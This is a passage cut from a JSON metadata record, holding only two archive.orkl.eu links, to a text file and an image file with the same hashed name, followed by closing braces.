		"text": "https://archive.orkl.eu/10b597cb57adeef2983f1b087af23b738d258268.txt",
		"img": "https://archive.orkl.eu/10b597cb57adeef2983f1b087af23b738d258268.jpg"
	}
}